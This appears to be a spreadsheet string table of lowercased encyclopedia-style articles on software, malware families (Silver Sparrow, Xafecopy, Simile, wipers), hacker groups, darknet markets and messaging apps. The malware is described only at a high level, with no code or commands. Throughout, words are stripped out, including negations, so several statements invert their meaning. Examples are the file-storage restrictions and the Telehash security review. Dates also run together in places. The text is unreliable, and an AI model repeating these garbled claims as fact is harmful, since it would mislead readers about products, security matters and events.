    <t>yandex.disk (russian: яндекс.диск) cloud service created yandex lets users store files “cloud” servers share others online. service based syncing data different devices. yandex.disk launched english june 2012. features storage users upload save files. there restrictions length time files stored. files uploaded encrypted connection checked antivirus. syncing files synced user's internet-enabled devices either interface yandex.disk mobile/desktop application. sharing users share file download links others. preview built-in flash player lets people preview songs. integration yandex services lets people manage files yandex services yandex.mail yandex.narod. sent received mail attachments automatically placed folder easily searched.webdav support means files managed application supporting webdav protocol. yandex.disk used software program supporting webdav.since october 2019, yandex.disk started throttling webdav, causing clients time out, official page redirects yandex.disk client page, support writes: “yandex.disk personal service designed used infrastructure element. tasks, yandex.cloud" supported platforms version located inside yandex.mail “files” tab. desktop application there applications available following operating systems: windows sp3, windows vista, windows windows macos command line version linux mobile version mobile version available for: android mobile lets users view files yandex.disk, upload files mobile device, download files offline email file download links. yandex.disk yandex.disk makes easier sync info smartphones, tablet pcs, laptops desktop computers. lets developers: manage yandex.disk user files store files created developers’ software store application settings internet-enabled devicethe yandex.disk documentation released april 2012. storage service provided completely free charge. everyone starts free allowance 10gb, increased increments referring others additional maximum total. also, additional storage paid monthly yearly basis. users choose enable device auto-uploads using yandex.disk android additional free storage. this increases maximum storage history april 2012 beta version service launched. 2012 first open source client launched. 2012 flash player introduced interface “save disk” button added shared file page, allows users share files published others account. june 2012 english turkish versions available. also yandex cloud computing comparison file hosting services comparison online backup services references external links official website</t>
  </si>
  <si>
    <t>Silver Sparrow (malware)</t>
  </si>
  <si>
    <t>silver sparrow computer virus malware runs x86- apple m1-based macintosh computers. engineers cyber security firm canary detected versions malware january february 2021. description versions malware reported. first version (described "non-m1" version) compiled intel x86-64. first detected january 2021. second version contains code runs natively apple's proprietary processor, probably released december 2020 discovered february 2021. virus connects server hosted amazon services. software includes self-destruct mechanism.as february 2021, information malware spread system compromised sparse. uncertain whether silver sparrow embedded inside malicious advertisements, pirated software, bogus adobe flash player updaters. canary theorized systems could infected malicious search engine results might directed download code. ultimate object malware's release also still unknown.silver sparrow second malware virus observed include m1-native code. impact february 2021, internet security company malwarebytes discovered 29,000 macs worldwide running anti-malware software infected silver sparrow. silver sparrow infected macs found countries february higher concentrations reported canada, france, germany, according data malwarebytes. over 39,000 macs affected beginning march 2021.on february 2021, spokesperson apple inc. stated "there evidence suggest malware identified delivered malicious payload infected users." apple also revoked certificates developer accounts used sign packages, thereby preventing additional macs becoming infected. references</t>
  </si>
  <si>
    <t>Timbaland plagiarism controversy</t>
  </si>
  <si>
    <t>2007 dance-pop song performed canadian singer-songwriter nelly furtado features elements plagiarized "acidjazzed evening", chiptune-style track composed finnish demoscene artist janne suni. timbaland, it"'s producer, admitted sampling suni's work, believe usage constituted "stealing", calling allegations "ridiculous". although users noted similarities tracks finnish demoscene forums july 2006, timbaland plagiarism controversy attracted mainstream attention january 2007, internet users posted videos youtube alleging timbaland plagiarized suni's work. soon afterwards, controversy attracted attention finnish news portal edome, rolling stone websites, published articles detailing events controversy. released fifth north american single loose july 2007. background original track, titled "acidjazzed evening", chiptune-style, 4-channel amiga module composed finnish demoscener janne suni (a.k.a. tempest). song first place oldskool music competition assembly 2000, demoparty held helsinki, finland, 2000. according scene.org, song uploaded servers year, long release song furtado. song later remixed (with suni's permission) norwegian glenn rune gallefoss (a.k.a. grg) commodore format—this version later used it". first published disk magazine australia august 2002 added high voltage collection december 2002.a video claims show proof plagiarism posted youtube january 2007. another video posted youtube january 2007, claiming timbaland also stole tune year earlier ringtone block party, several sold united states 2005. authors' comments janne suni janne suni posted following comment regarding copyright status "acidjazzed evening" january 2007: ...i never given copyrights acidjazzed evening. also never authorized commercial song. 2002, however, glenn rune gallefoss (also known grg) made conversion/arrangement acidjazzed evening released commercially. this arrangement made commodore computer. authorized glenn rune gallefoss explicitly asked permission releasing arrangement. february 2007, added following note: i'll correct persistent misconception: using services firm since september 2006. things gradually developing behind scenes, whatever result turns like, i'll publish available info soon possible. september 2007, webpage updated following information: case regarding controversy come closure. just before, answer questions case. glenn gallefoss news portal c64.sk published following comment glenn gallefoss january 2007: version sampled do-it hear waveform bleeps random places (only voices know), arpeggios using filters, even hear lead using multipulse routine (which rarely use, acidjazz.sid february gallefoss published following comment personal page: much tell matter. made deal lawyers. sometime near future, something happen. universal nelly furtado hannu sormunen, finnish representative universal, represents nelly furtado finland, commented controversy follows january 2007, issue iltalehti: case artist decides pursue matter further, america confront local law. require considerable amount faith and, course, money. first legal action universal finland officially filed helsinki district court mid-august 2007, behalf glenn gallefoss. timbaland february 2007, timbaland responded plagiarism accusations interview radio show elliot morning. interview, timbaland admitted called "sampling", also claimed sampling "not stealing", "everybody samples everybody every day". timbaland also said sample "from video game" mentioned commodore also said time research sometimes impossible "know what's public domain what's not". timbaland also called issue "ridiculous" mentioned legal discussions" therefore able much also called janne suni "idiot" "freakin' jerk" show.on february 2007, timbaland commented issue interview: makes laugh. part understand, dude trying like went house took computer. know paint. years deep. that's attack king? attack moi? come man. come correct. laughing stock. people like, "you can't serious." third-party analysis device timbaland's studio, seen video clips show timbaland's diary, identified elektron sidstation. this device midi-controlled synthesizer based chip commodore capable playing back .sid files would sounded original hardware. speculated timbaland downloaded gallefoss' version song high voltage collection used sidstation running studio system.chris abbott, maintainer website c64audio.com, posted in-depth analysis topic summarizes online article. abbott commercially released commodore music, notably "back time" series. abbott writes: what appears happened three-voice output original version bass voice silenced: missing bass voice follows original tune except couple changed notes, removal octave jumps. however, various technical procedures show components song (chords/melody/rhythm) exactly reproduced. this vanishingly unlikely happened chance. abbott also notes although evidence seems conclusive, eventual outcome not. court proceedings august 2007, action infringement filed district court helsinki universal music, alleging nelly furtado's song infringed "acidjazzed evening". january 2009, trial included multiple expert technical witnesses, three judge panel unanimously dismissed plaintiff's case.on december 2008, abbott also testified witness prosecution helsinki court gallefoss' case universal music finland. finnish court reportedly threw case ruling aspects three claims (sampling, performance rights, producer rights), case remains appellate court, january 2010.on june 2009, mikko välimäki, legal counsels kernel records, owner sound recording rights, reported case filed florida. june 2011, case kernel records mosley ended court deciding tune work first published internet kernel records failed register copyright united states. this reversed decision moberg llc, decided photograph published online germany work.the copyright dispute eventually settled court undisclosed sum. similar cases earlier examples unauthorized commercial music brought sources covering timbaland plagiarism controversy. often-mentioned example zombie nation's 1999 kernkraft 400, remake david whittaker's song 1984 commodore game lazy jones. legal action pending. another example dutch you've love, artist "bastian" bron sampled drums jeroen tel's reyn ouwehand's song made rubicon game. both cases original authors court.the fitts fight case also involved copied chipmusic. april 2008, similar case revealed self-proclaimed "chiptune maestro" laromlab, released self-titled album mushpot records; shortly discovered entire album fact work chiptune collective called rockerz. mushpot responded dropping laromlab immediately label, laromlab issued apology, stating "project hoax, complete fallacy". media coverage beginnings controversy earliest internet forum posts suggesting based "acidjazzed evening" date back july 2006, according finnish news portal edome, "suni demoscene hobbyists" already knew time. mainstream coverage first large media react on-line controversy finnish broadcasting company, published news item topic january 2007.the electronic music magazine side-line complete news round-up website. finnish tabloids ilta-sanomat, iltalehti, newspapers itviikko, digitoday also published articles suspected plagiarism january 2007. january finnish news portal edome published article case saying english summary that: beyond doubt timothy "timbaland" mosley directly copied large sections janne suni’s songs, much "fair use" would allow. timbaland sampled tiny bits effects song, whole sections. this clear breach copyright. article also covered similar cases past notified competition prize ceremony "were witnessed 4000-5000 people event. competition ceremony also shown helsinki area cable tv". day, news reached norwegian media, including norwegian broadcasting corporation dagbladet, interviewed gallefoss. january case reported briefly rolling stone website, magazine, popular german news portal heise online. heise's story suggests timbaland downloaded gallefoss's arrangement high voltage collection.on january rolling stone controversy news detailed article. later jose mercury news covered story blog.on january took notice issue longer article video news. clear video news actually broadcast merely posted online. mtv-owned sister station vh-1 also published news story. attempted reach timbaland's representatives phone e-mail, "had responded press time". also technology fitts fight jones gutnick moberg references external links acidjazzed evening (mod format, zip-compressed) music video youtube acid jazz (c64 remix) (sid format) collection different sources issue</t>
  </si>
  <si>
    <t>Xafecopy Trojan</t>
  </si>
  <si>
    <t>xafecopy trojan malware software targeting android operating system, first identified september 2017 cybersecurity antivirus provider kaspersky lab. according kaspersky lab, xafecopy infected least 4,800 users within month approximately countries. users india primary victims, followed users russia, turkey, mexico. history xafecopy first discovered kaspersky 2017 infected thousands android-based devices india. malware reported embedded variety apps, commonly battery optimizers. malicious code downloaded onto device without knowledge consent user. clicks pages wireless application protocol (wap) billing method, xafecopy subscribes phone number services charge money directly user's mobile phone bill. technology also able bypass captcha systems.xafecopy found using javascript file names previously used infamous ztorg trojan, triggering speculation possibility code sharing cyber criminal gangs. operation xafecopy disguises useful app, often battery optimizer. operates clicking pages billing system form mobile payment system charged directly mobile bill. malware works wap-enabled android devices gprs wireless connection based ubsod family. detected kaspersky trojan-clicker-androidos.xafekopy. xafecopy receives billing addresses pages command-and-control server. once address received device, clicks billing links, initiates session server, obtains user's msisdn charges directly user's mobile carrier bill subscribes unwanted paid services.xafecopy appears technology bypasses captcha systems. according kaspersky lab, shares significant coding obtained significant malware.modified versions xafecopy also identified capability sending device premium-rate phone numbers, deleting incoming mobile network provider, hiding alerts balance deduction reading incoming messages checking words like "subscription".it also capable switching user wifi connection mobile data, billing works user connected mobile connection. also trojan horse (computing) references</t>
  </si>
  <si>
    <t>Talking Angela</t>
  </si>
  <si>
    <t>talking angela chatterbot developed slovenian studio outfit7 part talking friends series. released november 2012 january 2012 iphone, ipod ipad, january 2013 android, january 2014 google play. app's successor, talking angela app, released december 2014. paedophile hoax february 2014, talking angela subject internet hoax claiming encourages children disclose personal information themselves, ostensibly used paedophiles identify location children. rumor, widely circulated facebook various websites claiming dedicated parenting, claims angela, game's main character, asks game's user private personal information using game's text-chat feature. other versions rumor even attribute disappearance child app, claim paedophile ring, even claim user recorded camera seen angela's eyes.it debunked snopes.com soon afterwards. site's owners, barbara david mikkelson, reported tried "prompt" give responses asking private information unsuccessful, even asking explicitly sexual questions. while true that, game child mode off, angela user's name, personal preferences determine conversation topics, outfit7 said information "anonymized" personal information removed also impossible person take control angela says game, since based chat software.in 2015, hoax revived facebook, prompting online security company sophos guardian debunk again. sophos employee paul ducklin wrote company's blog message posted facebook promoting hoax "close rambling, repetitious words, despite claiming start didn’t words describe situation. it's ill-written, borders illiterate incomprehensible." bruce wilcox, game's programmers, attributed hoax's popularity fact chatbot program talking angela realistic.however, genuine concern raised game's child mode easy children turn off, which, did, would allow purchase "coins", used currency game, itunes. disabling child mode also enables chat feature, which, "connecting children paedophiles," still raises concerns well, according stuart dredge, journalist guardian. dredge wrote chat mode, angela asks information user's name. impact scare significantly boosted game's popularity, credited helping make free iphone apps soon hoax became widely known february 2015 popular iphone apps start following month. 2017 chat feature removed app. also talking friends talking references</t>
  </si>
  <si>
    <t>Simile (computer virus)</t>
  </si>
  <si>
    <t>win32/simile (also known etap metaphor) metamorphic computer virus written assembly language microsoft windows. virus released recent version early march 2002. written virus writer "mental driller". some previous viruses, win95/drill (which used tuareg polymorphic engine), proved challenging detect. when virus first executed, checks current date. host file (the file infected virus) imports file user32.dll, 17th march, june, september, december, message displayed. depending version virus, case letter text altered randomly. (the anniversary israeli independence day), message saying "free palestine!" displayed system locale hebrew.the virus rebuilds itself. this metamorphic process complex accounts around virus' code. after rebuild, virus searches executable files folders fixed remote drives. files infected located subfolder three levels deep, folder name begins letter file found, percent chance ignored. files infected begin letter appears anywhere file name. name matching done, file names contain certain characters also infected, although part deliberate. virus contains checks avoid infecting "goat" "bait" files (files created anti-virus programs). infection process uses structure host, well random factors, control placement virus body decryptor. also metamorphic code zmist self-modifying code strange loop polymorphic code timeline computer viruses worms references external links analysis symantec security response (archive) /virus:win32/simile.gen</t>
  </si>
  <si>
    <t>Telehash</t>
  </si>
  <si>
    <t>telehash mesh networking protocol aims secure. protocol licensed creative commons public domain.telehash implementations still development 2014. security-sensitive application, receive third-party security review. telehash similar resilio sync allows users software share data securely without central server authority. there implementations python, ruby, erlang, javascript, objective-c.telehash used locker project, planned used communication file transfer mechanism git-annex. also bittorrent sync locker (software) references external links telehash.org homepage telehash history</t>
  </si>
  <si>
    <t>Yamanner</t>
  </si>
  <si>
    <t>yamanner worm computer worm written javascript targeted vulnerability yahoo! mail service. released june 2006, worm spread yahoo! system, infecting systems opened e-mails sending user's address book remote server. external links worm wriggles yahoo mail flaw symantec advisory</t>
  </si>
  <si>
    <t>WiperSoft</t>
  </si>
  <si>
    <t>wipersoft anti-spyware program developed wiper software. designed help users protect computers threats adware, browser hijackers, worms, potentially unwanted programs (pups), trojans, viruses. currently available microsoft windows. history wipersoft launched 2015 available free program home users. users able scan removal functions without subscription. 2016, re-released design, improved detection removal functionalities user-friendly interface. that year, wipersoft also became paid program. wipersoft increase downloads sales 2017, reportedly used million users different countries.it tested softpedia 2017 rated 100% clean. product wipersoft primarily anti-spyware program, comes versions. free wipersoft offers users scan computers malware. paid wipersoft features include malware detection removal, help desk services custom fix. according wiper software, program detect remove threats like potentially unwanted programs, adware, browser hijackers, questionable toolbars, browser add-ons, viruses, trojans more. detected potential threats automatically deleted, users option keeping installed. program also undo changes made detected threats, change homepage default search engine. availability program currently available microsoft windows users. popular browsers, google chrome, mozilla firefox, internet explorer opera supported. program available languages. references external links wipersoft digital journal wipersoft softpedia review</t>
  </si>
  <si>
    <t>Wiper (malware)</t>
  </si>
  <si>
    <t>computer security, wiper class malware intended erase (wipe) hard drive computer infects, maliciously deleting data programs. examples piece malware referred "wiper" allegedly used attacks iranian companies. 2012, international telecommunication union supplied kaspersky hard drives allegedly damaged wiper analysis. while sample alleged malware could found, kaspersky discovered traces separate piece malware known flame.the shamoon malware contained disk wiping mechanism; employed 2012 2016 malware attacks targeting saudi energy companies, utilized commercial direct drive access driver known rawdisk. original variant overwrote files portions image burning u.s. flag. 2016 variant nearly identical, except using image body alan kurdi instead.a wiping component used part malware employed lazarus group—a cybercrime group alleged ties north korea, 2013 south korea cyberattack, 2014 sony pictures hack. sony hack also utilized rawdisk.in 2017, computers several countries—most prominently ukraine, infected variant petya ransomware, modified effectively wiper. malware infects master boot record payload encrypts internal file table ntfs file system. although still demanded ransom, found code significantly modified payload could actually revert changes, even ransom successfully paid.several variants wiper malware discovered russian invasion ukraine early 2022 computer systems associated ukraine. named caddywiper, hermeticwiper, isaacwiper, foxblade researchers, programs showed little relation other, prompting speculation, created different state-sponsored actors russia especially occasion. references</t>
  </si>
  <si>
    <t>Xbox Underground</t>
  </si>
  <si>
    <t>xbox underground international hacker group responsible gaining unauthorized access computer network microsoft development partners, including activision, epic games, valve, order obtain sensitive information relating xbox xbox live. microsoft microsoft's computer network compromised repeatedly xbox underground 2011 2013. according 65-page indictment, hackers spent "hundreds hours" searching microsoft's network copying log-in credentials, source code, technical specifications data. this culminated perpetrators carrying physical theft, using stolen credentials enter secure building" microsoft's redmond headquarters exiting publicly unreleased prototypes xbox codenamed "durango". group members driven strong curiosity microsoft's then-unreleased xbox console associated software. beginning january 2011, microsoft victim incidents unauthorized access computer networks, including gdnp's protected computer network, resulted theft log-in credentials, trade secrets intellectual property relating xbox gaming system. september 2013, alcala pokora brokered physical theft, committed a.s. e.a., multiple xbox development kits (xdks) secure building microsoft's redmond, washington campus. using stolen access credentials microsoft building, a.s. e.a. entered building stole three non-public versions xbox console... apache helicopter simulator software group also accused breaching computer network zombie studios, obtained apache helicopter simulator software developed united states military. david pokora quoted saying: "have listening [expletive] i've done past month? [expletive] u.s. military. [expletive] australian department defense every single company intel, amd, nvidia game company could name, google, microsoft, disney, warner bros., everything." members four members group pleaded guilty charges. david pokora, first foreign hacker ever sentenced united states soil, received 18-month prison term april 2014 released july 2015. nathan leroux sanad odeh nesheiwat sentenced june received months months respectively; austin alcala sentencing july, though went cooperate resolving another criminal case involving illegal trade fifa coins.dylan wheeler (referred indictment d.w), currently reach united states, lived australia time charged varying degree charges. convicted, fled australia dubai eventually czech republic human rights political issues trial can’t extradited since holds czech citizenship, currently living mother, anna wheeler, later jailed years helping flee australia avoid criminal charges.wheeler alleges sixth member, justin (referred "person a"), worked bring group". previously placed pre-trial probation earlier offense involving data theft, agreement required stay xbox live. came renewed interest 2017 seized coupe $38,595 cash hidden throughout home. june 2021, sentenced seven years prison defrauding million dollars several tech companies, among microsoft cisco systems, exploiting warranty policies illegitimately receive replacements sold online. references</t>
  </si>
  <si>
    <t>TheRealDeal</t>
  </si>
  <si>
    <t>therealdeal darknet website part cyber-arms industry reported selling code zero-day software exploits.the creators claimed interview deepdotweb site founded direct response number dark websites emerged past years actually anything value sell scams. site relied bitcoin similar darknet markets required multi-signature transactions. there speculation computer security community whether site enforcement sting operation apparent listing exploits many times potential market value.in july 2015 website hours time cyber crime forum darkode seized various members arrested 'operation shrouded horizon'. august 2015 site went offline unknown reasons. december announced reopening deepdotweb. real deal shut november 2016.in 2020, cybersecurity author vinny troia provided analysis marketplace's mysql database, revealed site's three admins members dark overlord hacking group. also wabisabilabi references external links official site: trdealmgn4uvm42g.onion (accessing link help)</t>
  </si>
  <si>
    <t>Z-Library</t>
  </si>
  <si>
    <t>z-library (abbreviated z-lib, formerly bookfinder) mirror library genesis, shadow library project file-sharing access scholarly journal articles, academic texts general-interest books. most books library genesis uploaded directly site individuals. individuals also contribute website's repository make literature accessible many people possible. july 2022, z-lib states possesses 10,146,234 books 86,874,856 articles. according project's page academic articles booksc.org), claims "the world's largest e-book library", well "the world's largest scientific articles store". z-library also describes non-profit organization sustained donations. history footer project's pages contains phrase "free ebooks since 2009." z-library better-known shadow libraries, along sci-hub library genesis. organization publishers association attempted enact internet service provider-level blocks z-library.in late 2015, publisher elsevier filed successful court request ordered registrar bookfi.org seize site's internet domain. bookfi.org, booksc.org b-ok.org included 2017 office united states trade representative report notorious markets. functionality unlike library genesis sci-hub, much known z-library terms operation, management, commercial status mission statement. notably, z-library open full database public. despite that, database mirrored archivists 2022.in effort prevent blacklisting domains (oftentimes internet providers dns-level accordance legal procedures), z-library uses homepage memorable domain. homepage contain infringing content, instead lists many working mirror domains different regions. these domains switched need memorable. instance, include numbers.z-library team claims servers finland, germany, luxembourg, malaysia, panama, russia usa, size database librarians z-library librarians largely professionally silent z-library. exception, mikael böök, library activist, essay "herding wind: journey strange world e-library autumn year 2020". böök connects purpose z-library five laws library science ranganathan. also notes michael hart, inventor e-book founder project gutenberg precursor z-library. böök addresses issues copyright, perplexing case books ming, roles world trade organization (wto) world intellectual property organization (wipo). also references external links "z-library: about features, reviews alternatives" (grabtech; october 2021) "here's need know about z-library" (ityug; september 2021) "all about z-library alternatives websites" (infomafia; 2022)</t>
  </si>
  <si>
    <t>YapBrowser</t>
  </si>
  <si>
    <t>yapbrowser, also known yapsearch yapcash, rogue browser removed internet security researchers found serving child porn advertising. eventually reappeared [1], peculiar twist; came claim users could expect protection harmful exploits viruses. site hosting browser download originates russia includes "adult version" lets users search browse pornography-themed content free. site even offers "100% guarantee" malicious system infection occur using software, security researchers tracking seedier side internet flagged yapbrowser serious threat computer users. first sign yapbrowser trouble came april 2006 malware researchers discovered browser serving spyware underage porn advertising. mcafee flags yapbrowser "potentially unwanted program" directs user yapsearch.com search portal. appears yapbrowser primarily front-end internet explorer html rendering engine uses commercial links push users shopping search portals. june 2006 yapbrowser acquired search engine myallsearch.com. external links yapbrowser homepage searchwebme press release yapbrowser: serves zango and...child porn? return porn-fetching 'yapbrowser' raises eyebrows yapbrowser- spywareguide users warned after yapbrowser returns from dead world references https://www.theregister.co.uk/2011/10/10/yapbrowser_zombie_reanimates/</t>
  </si>
  <si>
    <t>XXXDial</t>
  </si>
  <si>
    <t>xxxdial spyware/dialer application created number problems internet users december 2004. changes victim's point-to-point protocol (ppp) settings automatically tries reconnect premium rate number, opposed user's normal dial-in number.it noted dialer give indication user using anything different standard isp's number actually charged rate times normal dialup ratethe dialer found wild" websites software often adult nature.this dialer appears affect computers running microsoft windows operating system. references</t>
  </si>
  <si>
    <t>XDedic</t>
  </si>
  <si>
    <t>xdedic ukrainian-language crime forum, shop marketplace. history founded time 2014, revealed june 2016 kaspersky report major trade compromised servers. 2016, 70,624 servers offered sale. following report, site shut quickly re-emerge dark web. services compromised servers focused areas online gambling, ecommerce, banks payment processors, online dating, advertising networks, services, email service providers, browser instant messenger services. various crimeware products sale.the site featured partner portal secure verified listing compromised data standardised backdoor used. shut january 2019, american belgian authorities working europol, eurojust ukraine shut xdedic, raiding sites seizing domain.as january 2020 asking victims machine take overs come forward. references</t>
  </si>
  <si>
    <t>Telegram Open Network</t>
  </si>
  <si>
    <t>open network (previous telegram open network, abb. ton) blockchain-based decentralized computer network technology, originally developed telegram team. 2020, telegram withdrew project litigation securities exchange commission. history since release telegram messenger 2013, pavel durov emphasized instant messenger include advertising. according documents related u.s. securities exchange commission (sec) telegram suit (2020), 2017, self-funded startup needed money servers services. durov considered venture capital financing decided problems solved. mid-december 2017 bloomberg interview, durov announced telegram would begin monetization early 2018. techcrunch soon confirmed company planned launch blockchain project named “the open network” “telegram open network” (ton) native cryptocurrency “gram”.in january 2018, 23-page white paper detailed 132-page technical paper shed light project. according documents, durovs planned attract existing telegram user base promote mass adoption cryptocurrencies, turning largest blockchains. described platform decentralized apps services akin wechat, google play, store, even decentralized alternative payment processing services visa mastercard ability scale support millions transactions second. codebase created nikolai durov, developer telegram's mtproto protocol, pavel became public figure project. gram private sale fund development messenger blockchain project, telegram attracted investments private gram offering. two-step legal scheme employed: gram purchase agreement structured future contract allowed investors receive tokens launched. futures sold accredited investors, offering exempt registration securities regulation securities 1933, basis operational, grams would utility would considered securities. contract drafted major u.s. firm skadden.the offering rounds, taking $850 million. russian tech news site calculated first round offering 2.25 billion tokens $0.38 each, minimum purchase million, second offering million tokens $1.33 each, minimum purchase million. april 2018, firm reported raising $1.7 billion ongoing ico. company officials made public statements regarding ico. spring 2018, official sources information forms telegram filed u.s. securities exchange commission. development development took place completely isolated manner opaque whole time. launch test network initially scheduled 2018 main network launch milestones postponed several times. testnet launched january 2019 half year deviation plan. company released lite version blockchain network client. september company released complete source code nodes github, making possible launch full node explore testnet. launch main network scheduled october telegram concerns gram private sale contacted telegram shortly after, months communication, sides come understanding. october 2019, couple weeks planned launch, obtained temporary restrictive order prevent distribution grams. regulator contended initial gram purchasers would acting akin underwriters, resale grams, distributed, unregistered distribution securities.after lengthy legal battle telegram sec, judge kevin castel u.s. district court southern district york agreed sec's vision sale grams, distribution initial purchasers, highly likely future resale viewed single "scheme" distribute grams secondary market unregistered security offering. "security" issue consisted whole contracts, expectations, understandings around sale distribution tokens interested public, grams themselves. case, initial purchasers acted underwriters planned resell tokens, consume them. restrictions gram distribution remained force purchasers based outside u.s., telegram tools prevent u.s. citizens purchasing grams secondary market.following court decision, telegram open network team announced would unable launch project expected april 2020 deadline. 2020, pavel durov announced telegram's active involvement ton. june telegram settled u.s. securities exchange commission agreed return $1.22 billion "termination amounts" gram purchase agreements, $18.5 million penalty sec. company also agreed notify plans issue digital assets next three years. judge approved settlement june "new innovative businesses welcome participate capital markets, cannot violation registration requirements federal securities laws," spokesperson noted. telegram subsequently shut test networkin 2020, telegram repaid investors $770 million converted $443 million one-year debt interest, raising total liabilities $625.7 million. march 2021, company made placement 5-year bonds worth billion cover debts return april 2021. post telegram 2020, telegram's commitment project unclear, projects started develop technology.launched 2020, free project continue development telegram open network technology using source code freely available gpl. january 2021, community project reached 30,000 people. free ton's token titled "ton crystal" "ton" distributed reward contributions network. five billion tokens issued moment launch, reserved users, validators, developers (including dedicated labs, developer middleware blockchain, essential part free ton).on june 2021, telegram team said would consider granting ton.org domain github repository foundation, response open letter. august domain transferred foundation. architecture designed enable processing millions transactions every second. also allows building web3 empowered decentralized storage, equivalent, instant payments decentralized services dapps). planned network blockchains different types aims achieving increased scalability. hoped shard {\displaystyle 2^{60}} shard blockchains (shardchains) would shards {\displaystyle 2^{32}} working blockchains (workchains) validated committed master blockchain (masterchain). references</t>
  </si>
  <si>
    <t>Russian–Ukrainian cyberwarfare</t>
  </si>
  <si>
    <t>cyberwarfare component confrontation russia ukraine since collapse soviet union 1991. while first attacks information systems private enterprises state institutions ukraine recorded mass protests 2013, russian cyberweapon uroburos around since 2005. russian cyberwarfare continued ukraine power grid hack christmas 2015 2016, paralysis state treasury ukraine december 2016, mass hacker supply-chain attack june 2017 attacks ukrainian government websites january 2022. history russian–ukrainian cyberwarfare component confrontation russia ukraine since collapse soviet union 1991. russian cyberweapon uroburos around since 2005. however, first attacks information systems private enterprises state institutions ukraine recorded mass protests 2013. 2013, operation armageddon, russian campaign systematic cyber espionage information systems government agencies, enforcement, defense agencies, began, thought help russia battlefield. between 2013 2014, information systems ukrainian government agencies affected computer virus known snake uroborus turla. february-march 2014, russian troops entered crimea communication centers raided ukraine's fibre optic cables tampered with, cutting connection peninsula mainland ukraine. additionally ukrainian government websites, news social media shut targeted ddos attacks, cell phones many ukrainian parliamentarians hacked jammed. ukrainian experts also stated beginning cyberwar russia. cybersecurity companies began register increase number cyberattacks information systems ukraine. victims russian cyberattacks government agencies ukraine, united states, defense agencies, international regional defense political organizations, think tanks, media, dissidents. 2015, researchers identified groups russian hackers active russian-ukrainian cyber war: so-called apt29 (also known cozy bear, cozy duke) apt28 (also known sofacy group, tsar team, pawn storm, fancy bear). cyberattacks russian cyberattacks operation "armageddon", 2013 operation "snake", february 2014 attacks automated system "elections", june 2014 ukraine power grid hack, december 2015. attacks using trojan virus blackenergy energy companies ukraine provide energy kyiv, ivano-frankivsk chernivtsi regions this first successful cyber attack power grid. second ukraine power grid hack, december 2016. paralysis state treasury ukraine, december 2016 2017 cyberattacks ukraine, mass hacker supply-chain attack, june 2017 using petya virus according presidential administration, attack became largest known hacker attack. 2022 ukraine cyberattack, attacks ukrainian government websites, january 2022, us-russian negotiations ukraine’s future nato failed. attacks february 2022, russian troops invaded eastern regions ukraine, took several major ukrainian governmental banking websites. u.s. intelligence attributed attacks russian attackers, although russian government denied involvement. ukrainian cyberattacks operation "prikormka (groundbait)", 2016 operation "may 2016 successful hacks sites separatist group "donetsk people's republic", well russian sites anti-ukrainian propaganda resources russian private military companies.) “channel one” break, june 2016 (hacking corporate server russian "channel one" ukrainian cyber alliance hackers falconsflame, trinity rukh8) surkov leaks, october 2016 leak 2,337 e-mails hundreds attachments, reveal plans seizing crimea ukraine fomenting separatist unrest donbas (documents dated september 2013 december 2014). army ukraine established mykhailo fedorov, first vice prime minister minister digital transformation, february 2022. effort initiated 2022 russian invasion ukraine. primary cyberwarfare russia. fedorov requested assistance cyber specialist tweeted telegram list websites russian business state organizations. russian-ukrainian cyberwarfae amidst russian invasion ukraine 2022 june 2022, microsoft published report russian cyber attacks, concluded state-backed russian hackers "have engaged "strategic espionage" governments, think tanks, businesses groups" countries supporting kyiv.in april 2022, microsoft report shared details russian cyberwarfare ukraine, instance microsoft reported cases, hacking military operations worked tandem ukraine related target. also wannacry ransomware attack, 2017 chinese cyberwarfare cyberwarfare russia cyberwarfare united states cyberwarfare iran list cyber warfare forces references external links inside ukrainian 'hacktivist' network cyberbattling kremlin</t>
  </si>
  <si>
    <t>Threema</t>
  </si>
  <si>
    <t>threema paid proprietary end-to-end encrypted instant messaging service. clients android available. features service claims based privacy design principles requiring phone number personally identifiable information. this helps anonymize users degree.threema uses user created initial launch random generator, instead requiring linked email address phone number send messages. possible find users phone number email address user allows synchronize address book. linking phone number email address threema optional. hence, service used anonymously. users verify identity threema contacts scanning code meet physically. code contains public user, cryptographically tied change lifetime identity. using strong authentication feature, users make sure correct public chat partners, provides additional security man-in-the-middle attack. threema knows three levels authentication (trust levels contact's identity). verification level contact displayed threema application dots next corresponding contact. addition text messaging, users make voice video calls, send multimedia, locations, voice messages, files. version, threema web, used desktop devices, long phone threema installation user online. addition one-on-one chats, threema offers group chats people. users make voice video calls, send text voice messages, multimedia, locations, files type file). also possible create polls personal group chats. software threema developed swiss company threema gmbh. servers switzerland development based pfäffikon 2021, threema million users business version, threema work, used million users across 5,000 companies organizations.at july, 2021 threema introduced ability companies host messenger server, primarily intended companies significantly high privacy concerns. clients with threema web, client browsers, threema used devices like desktop computers, though long original device online. threema optionally supports android wear smartwatch android auto. threema launched support end-to-end encrypted video calls august 2020. calls person-to-person group calls unavailable.the application allow self-deletion messages period defined interlocutors. application prevent screenshots conversations. architecture entire communication threema end-to-end encrypted. during initial setup, application generates pair sends public server keeping private user's device. application encrypts messages files sent threema users respective public keys. once message delivered successfully, immediately deleted servers.the encryption process used threema based open-source library nacl library. threema uses asymmetric ecc-based encryption, 256-bit strength. threema offers "validation logging" feature makes possible confirm messages end-to-end encrypted using nacl networking cryptography library. august 2015, threema subjected external security audit. researchers cnlab confirmed threema allows secure end-to-end encryption, claimed unable identify weaknesses implementation. cnlab researchers also confirmed threema provides anonymity users handles contacts user data advertised. history threema founded december 2012 manuel kasper. company initially called kasper systems gmbh. martin blatter silvan engeler later recruited develop android application released early 2013.in summer 2013, snowden leaks helped create interest threema, boosting user numbers hundreds thousands. when facebook took whatsapp february 2014, threema 200,000 users, doubling userbase hours. around percent users came germany. march 2014 threema million users.in spring 2014, operations transferred newly created threema gmbh.in december 2014, apple listed threema most-sold 2014 german store.in 2020, threema expanded video calls, plans open-source client-side apps introduce reproducible builds them, well introduce threema education, variation threema intended education institutions. during second week 2021, threema quadrupling daily downloads spurred controversial privacy changes whatsapp messaging service. spokesperson company also confirmed threema risen charts paid applications germany, switzerland, austria. this trend continued third week year, head marketing sales confirming downloads increased times regular amount, leading "hundreds thousands users day". related products threema work: 2016, threema work, corporate version threema, released. threema work offers extended administration deployment capabilities. threema work based yearly subscription model.threema gateway: march 2015, threema released gateway companies. similar gateway, businesses send messages users threema installed. code threema gateway open developers available github.threema broadcast: august 2018, threema released threema broadcast, tool top-down communication. similar emails electronic newsletters, threema messages sent number feed subscribers, threema broadcast allows create chatbots.threema 